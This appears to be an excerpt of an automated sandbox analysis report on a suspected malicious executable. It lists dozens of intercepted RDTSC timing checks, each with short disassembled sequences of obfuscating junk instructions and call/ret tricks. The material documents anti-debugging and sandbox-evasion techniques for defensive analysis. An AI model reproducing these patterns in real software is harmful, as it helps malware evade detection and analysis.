                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C654D second address: 9C6579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B763h 0x00000009 jmp 00007F684908B764h 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6579 second address: 9C6581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9D46 second address: 9C9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9D57 second address: 9C9D72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007F6849049226h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push ecx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9E83 second address: 9C9EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9EA8 second address: 9C9ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6849049226h 0x0000000a popad 0x0000000b jmp 00007F6849049235h 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jc 00007F684904922Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA010 second address: 9CA021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F684908B756h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA021 second address: 9CA027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA027 second address: 9CA061 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F684908B758h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jno 00007F684908B760h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F684908B766h 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA061 second address: 9CA080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jne 00007F6849049228h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA080 second address: 9CA12C instructions: 0x00000000 rdtsc 0x00000002 je 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007F684908B764h 0x00000011 push 00000003h 0x00000013 push ebx 0x00000014 mov dword ptr [ebp+122D2316h], ecx 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d xor edi, dword ptr [ebp+122D39D3h] 0x00000023 jmp 00007F684908B761h 0x00000028 push 00000003h 0x0000002a call 00007F684908B759h 0x0000002f jmp 00007F684908B765h 0x00000034 push eax 0x00000035 jmp 00007F684908B75Ch 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jo 00007F684908B765h 0x00000044 jmp 00007F684908B75Fh 0x00000049 mov eax, dword ptr [eax] 0x0000004b jmp 00007F684908B767h 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 pushad 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA12C second address: 9CA196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6849049239h 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F6849049228h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jnl 00007F6849049227h 0x0000002c lea ebx, dword ptr [ebp+1244EC95h] 0x00000032 push edi 0x00000033 mov edi, 4E0BA4ABh 0x00000038 pop ecx 0x00000039 push eax 0x0000003a pushad 0x0000003b pushad 0x0000003c jbe 00007F6849049226h 0x00000042 jno 00007F6849049226h 0x00000048 popad 0x00000049 pushad 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA249 second address: 9CA278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jng 00007F684908B758h 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 jl 00007F684908B756h 0x0000001d pop edi 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB29E second address: 9EB2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684904922Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB2AE second address: 9EB2D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F684908B769h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F684908B756h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB2D5 second address: 9EB2F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB2F2 second address: 9EB305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F684908B75Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1DC4 second address: 9C1DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6849049230h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F6849049226h 0x00000012 jo 00007F6849049226h 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1DE7 second address: 9C1DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F684908B756h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1DFB second address: 9C1E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F6849049226h 0x00000010 jmp 00007F6849049238h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E918F second address: 9E9194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E98AB second address: 9E98B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E98B2 second address: 9E98CC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F684908B764h 0x00000008 jmp 00007F684908B75Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E98CC second address: 9E98D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9BE5 second address: 9E9BEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9D45 second address: 9E9D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9FC7 second address: 9E9FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9FD9 second address: 9E9FF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a jg 00007F684904924Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9FF4 second address: 9E9FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA250 second address: 9EA28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F6849049226h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007F6849049226h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F684904922Ch 0x0000001f popad 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6849049232h 0x0000002a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA28E second address: 9EA298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA298 second address: 9EA29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA29C second address: 9EA2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA2A0 second address: 9EA2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA2A8 second address: 9EA2B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F684908B756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA2B2 second address: 9EA2B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B29DB second address: 9B29FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c jmp 00007F684908B75Ah 0x00000011 pop ecx 0x00000012 jng 00007F684908B75Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA984 second address: 9EA99A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F684904922Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAC79 second address: 9EAC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAC7F second address: 9EAC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAE42 second address: 9EAE46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB123 second address: 9EB127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4915 second address: 9F4920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F684908B756h 0x0000000a pop edi 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4920 second address: 9F494E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F684904922Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F6849049232h 0x00000012 jng 00007F684904922Eh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F494E second address: 9F4952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4952 second address: 9F4972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6849049236h 0x00000009 jc 00007F6849049226h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4B04 second address: 9F4B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4B0D second address: 9F4B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F50A5 second address: 9F50AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F50AD second address: 9F50C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049235h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F50C6 second address: 9F50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F50D0 second address: 9F50D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F521B second address: 9F5246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B762h 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007F684908B756h 0x00000011 jmp 00007F684908B75Ah 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5246 second address: 9F5276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6849049226h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnp 00007F6849049228h 0x00000017 push ebx 0x00000018 jmp 00007F6849049230h 0x0000001d push eax 0x0000001e pop eax 0x0000001f pop ebx 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F873D second address: 9F8747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F684908B756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8B0A second address: 9F8B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8B0E second address: 9F8B14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9239 second address: 9F923D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9301 second address: 9F9325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebx 0x00000007 mov dword ptr [ebp+122D33C4h], ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F684908B764h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F948E second address: 9F94A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6849049226h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F957C second address: 9F9586 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9879 second address: 9F987D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F987D second address: 9F9883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9DCF second address: 9F9DEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049232h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9DEC second address: 9F9DF6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA838 second address: 9FA84A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA84A second address: 9FA89C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1CDAh], eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F684908B758h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov esi, dword ptr [ebp+122D37A5h] 0x00000035 mov dword ptr [ebp+12455CA1h], ebx 0x0000003b push 00000000h 0x0000003d xchg eax, ebx 0x0000003e push esi 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FCEFA second address: 9FCF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6849049230h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAFF4 second address: 9FAFFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F684908B756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE441 second address: 9FE445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE445 second address: 9FE44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE44B second address: 9FE45C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684904922Dh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF864 second address: 9FF868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF868 second address: 9FF8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, dword ptr [ebp+1244F208h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F6849049228h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov esi, dword ptr [ebp+122D399Bh] 0x00000032 mov edi, dword ptr [ebp+122D1ED2h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F6849049228h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov esi, dword ptr [ebp+122D3ABFh] 0x0000005a sub dword ptr [ebp+122D33C4h], edi 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jp 00007F6849049226h 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FEBA6 second address: 9FEBB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FEBB2 second address: 9FEBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6849049226h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A002FD second address: A0030F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F684908B756h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0030F second address: A00315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00315 second address: A003A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F684908B758h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D3423h], edi 0x0000002a push 00000000h 0x0000002c jp 00007F684908B758h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F684908B758h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e or dword ptr [ebp+122D1DDAh], ebx 0x00000054 xchg eax, ebx 0x00000055 jmp 00007F684908B765h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jnc 00007F684908B758h 0x00000063 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05541 second address: A05547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
